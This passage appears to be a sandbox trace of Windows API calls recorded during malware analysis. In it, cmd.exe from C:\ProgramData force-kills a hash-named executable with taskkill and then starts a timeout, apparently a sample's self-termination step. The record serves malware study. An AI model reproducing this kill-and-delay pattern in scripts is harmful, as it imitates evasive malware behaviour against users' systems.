[0127.295] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0127.296] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0127.296] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0127.296] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0127.296] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0127.296] GetProcessHeap () returned 0x4700000 [0127.296] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x210) returned 0x4700728 [0127.296] GetProcessHeap () returned 0x4700000 [0127.296] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb6) returned 0x4700940 [0127.301] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0127.301] GetProcessHeap () returned 0x4700000 [0127.301] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x418) returned 0x4700a00 [0127.301] SetErrorMode (uMode=0x0) returned 0x0 [0127.302] SetErrorMode (uMode=0x1) returned 0x0 [0127.302] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4700a08, lpFilePart=0x44ff51c | out: lpBuffer="C:\\ProgramData", lpFilePart=0x44ff51c*="ProgramData") returned 0xe [0127.302] SetErrorMode (uMode=0x0) returned 0x1 [0127.302] GetProcessHeap () returned 0x4700000 [0127.302] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4700a00, Size=0x38) returned 0x4700a00 [0127.302] GetProcessHeap () returned 0x4700000 [0127.302] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4700a00) returned 0x38 [0127.302] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0127.302] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.302] GetProcessHeap () returned 0x4700000 [0127.302] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xf2) returned 0x4700a40 [0127.302] GetProcessHeap () returned 0x4700000 [0127.302] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1dc) returned 0x4700b40 [0127.305] GetProcessHeap () returned 0x4700000 [0127.305] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4700b40, Size=0xf4) returned 0x4700b40 [0127.305] GetProcessHeap () returned 0x4700000 [0127.305] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4700b40) returned 0xf4 [0127.305] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0127.305] GetProcessHeap () returned 0x4700000 [0127.305] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xe0) returned 0x4700c40 [0127.305] GetProcessHeap () returned 0x4700000 [0127.305] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4700c40, Size=0x76) returned 0x4700c40 [0127.305] GetProcessHeap () returned 0x4700000 [0127.305] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4700c40) returned 0x76 [0127.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.306] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x44ff2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff2a8) returned 0xffffffff [0127.306] GetLastError () returned 0x2 [0127.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x44ff2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff2a8) returned 0x4700cc0 [0127.307] GetProcessHeap () returned 0x4700000 [0127.307] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x0, Size=0x14) returned 0x47078d0 [0127.307] FindClose (in: hFindFile=0x4700cc0 | out: hFindFile=0x4700cc0) returned 1 [0127.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x44ff2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff2a8) returned 0xffffffff [0127.307] GetLastError () returned 0x2 [0127.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x44ff2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff2a8) returned 0x4700cc0 [0127.307] GetProcessHeap () returned 0x4700000 [0127.307] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x47078d0, Size=0x4) returned 0x4700d00 [0127.307] FindClose (in: hFindFile=0x4700cc0 | out: hFindFile=0x4700cc0) returned 1 [0127.308] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.308] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.308] GetConsoleTitleW (in: lpConsoleTitle=0x44ff79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0127.308] InitializeProcThreadAttributeList (in: lpAttributeList=0x44ff6c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x44ff6ac | out: lpAttributeList=0x44ff6c8, lpSize=0x44ff6ac) returned 1 [0127.308] UpdateProcThreadAttribute (in: lpAttributeList=0x44ff6c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x44ff6b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x44ff6c8, lpPreviousValue=0x0) returned 1 [0127.308] GetStartupInfoW (in: lpStartupInfo=0x44ff700 | out: lpStartupInfo=0x44ff700*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0127.308] GetProcessHeap () returned 0x4700000 [0127.308] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x18) returned 0x4707910 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0127.308] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.309] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.310] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.310] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.310] GetProcessHeap () returned 0x4700000 [0127.310] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4707910) returned 1 [0127.310] GetProcessHeap () returned 0x4700000 [0127.310] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xa) returned 0x4700cc0 [0127.310] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.314] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\ProgramData", lpStartupInfo=0x44ff650*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x44ff69c | out: lpCommandLine="taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f ", lpProcessInformation=0x44ff69c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf88, dwThreadId=0xd98)) returned 1 [0127.838] CloseHandle (hObject=0xa4) returned 1 [0127.838] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.838] GetProcessHeap () returned 0x4700000 [0127.838] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470ac88) returned 1 [0127.838] GetEnvironmentStringsW () returned 0x470a328* [0127.838] GetProcessHeap () returned 0x4700000 [0127.838] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb0a) returned 0x470ae40 [0127.838] FreeEnvironmentStringsA (penv="=") returned 1 [0127.838] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0132.888] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x44ff634 | out: lpExitCode=0x44ff634*=0x0) returned 1 [0132.888] CloseHandle (hObject=0xa8) returned 1 [0132.889] _vsnwprintf (in: _Buffer=0x44ff71c, _BufferCount=0x13, _Format="%08X", _ArgList=0x44ff63c | out: _Buffer="00000000") returned 8 [0132.889] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.889] GetProcessHeap () returned 0x4700000 [0132.889] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470ae40) returned 1 [0132.889] GetEnvironmentStringsW () returned 0x470a328* [0132.889] GetProcessHeap () returned 0x4700000 [0132.889] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb30) returned 0x470c490 [0132.889] FreeEnvironmentStringsA (penv="=") returned 1 [0132.889] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.889] GetProcessHeap () returned 0x4700000 [0132.889] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470c490) returned 1 [0132.889] GetEnvironmentStringsW () returned 0x470a328* [0132.889] GetProcessHeap () returned 0x4700000 [0132.889] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb30) returned 0x470c490 [0132.889] FreeEnvironmentStringsA (penv="=") returned 1 [0132.889] GetProcessHeap () returned 0x4700000 [0132.889] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4700cc0) returned 1 [0132.889] DeleteProcThreadAttributeList (in: lpAttributeList=0x44ff6c8 | out: lpAttributeList=0x44ff6c8) [0132.890] GetConsoleTitleW (in: lpConsoleTitle=0x44ff9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0132.892] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0132.892] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0132.892] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0132.892] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0132.892] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0132.892] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0132.892] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0132.892] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0132.892] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0132.892] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0132.892] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0132.892] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0132.892] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0132.892] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0132.892] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0132.892] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0132.892] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0132.892] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0132.893] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0132.893] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0132.893] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0132.893] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0132.893] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0132.893] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0132.893] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0132.893] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0132.893] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0132.893] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0132.893] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0132.893] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0132.893] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0132.893] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0132.893] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0132.893] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0132.893] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0132.893] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0132.893] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0132.893] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0132.893] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0132.893] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0132.893] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0132.893] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0132.893] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0132.893] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0132.893] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0132.893] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0132.894] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0132.894] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0132.894] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0132.894] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0132.894] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0132.894] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0132.894] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0132.894] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0132.894] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0132.894] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0132.894] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0132.894] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0132.894] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0132.894] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0132.894] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0132.894] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0132.894] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0132.894] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0132.894] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0132.894] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0132.894] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0132.894] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0132.894] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0132.895] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0132.895] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0132.895] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0132.895] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0132.895] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0132.895] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0132.895] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0132.895] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0132.895] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0132.895] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0132.895] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0132.895] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0132.895] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0132.895] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0132.895] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0132.895] _wcsicmp (_String1="timeout", _String2="FOR") returned 14 [0132.895] _wcsicmp (_String1="timeout", _String2="IF") returned 11 [0132.895] _wcsicmp (_String1="timeout", _String2="REM") returned 2 [0132.895] GetProcessHeap () returned 0x4700000 [0132.895] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x210) returned 0x4700e40 [0132.895] GetProcessHeap () returned 0x4700000 [0132.895] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x26) returned 0x4701058 [0132.895] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17 [0132.895] GetProcessHeap () returned 0x4700000 [0132.896] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x418) returned 0x4708300 [0132.896] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4708308, lpFilePart=0x44ff4bc | out: lpBuffer="C:\\ProgramData", lpFilePart=0x44ff4bc*="ProgramData") returned 0xe [0132.896] SetErrorMode (uMode=0x0) returned 0x1 [0132.896] GetProcessHeap () returned 0x4700000 [0132.896] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4708300, Size=0x36) returned 0x4708300 [0132.896] GetProcessHeap () returned 0x4700000 [0132.896] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4708300) returned 0x36 [0132.896] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0132.896] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.896] GetProcessHeap () returned 0x4700000 [0132.896] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xf2) returned 0x4708340 [0132.896] GetProcessHeap () returned 0x4700000 [0132.896] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1dc) returned 0x4708440 [0132.896] GetProcessHeap () returned 0x4700000 [0132.896] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4708440, Size=0xf4) returned 0x4708440 [0132.896] GetProcessHeap () returned 0x4700000 [0132.896] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4708440) returned 0xf4 [0132.896] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0132.896] GetProcessHeap () returned 0x4700000 [0132.897] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xe0) returned 0x4708540 [0132.897] GetProcessHeap () returned 0x4700000 [0132.897] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4708540, Size=0x76) returned 0x4708540 [0132.897] GetProcessHeap () returned 0x4700000 [0132.897] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4708540) returned 0x76 [0132.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.897] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x44ff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff248) returned 0xffffffff [0132.897] GetLastError () returned 0x2 [0132.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x44ff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff248) returned 0x470a170 [0132.897] FindClose (in: hFindFile=0x470a170 | out: hFindFile=0x470a170) returned 1 [0132.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM", fInfoLevelId=0x1, lpFindFileData=0x44ff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff248) returned 0xffffffff [0132.898] GetLastError () returned 0x2 [0132.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE", fInfoLevelId=0x1, lpFindFileData=0x44ff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44ff248) returned 0x470a170 [0132.898] FindClose (in: hFindFile=0x470a170 | out: hFindFile=0x470a170) returned 1 [0132.898] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.898] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.898] GetConsoleTitleW (in: lpConsoleTitle=0x44ff73c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0132.901] InitializeProcThreadAttributeList (in: lpAttributeList=0x44ff668, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x44ff64c | out: lpAttributeList=0x44ff668, lpSize=0x44ff64c) returned 1 [0132.901] UpdateProcThreadAttribute (in: lpAttributeList=0x44ff668, dwFlags=0x0, Attribute=0x60001, lpValue=0x44ff654, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x44ff668, lpPreviousValue=0x0) returned 1 [0132.901] GetStartupInfoW (in: lpStartupInfo=0x44ff6a0 | out: lpStartupInfo=0x44ff6a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0132.901] GetProcessHeap () returned 0x4700000 [0132.901] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x18) returned 0x4707b90 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.901] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 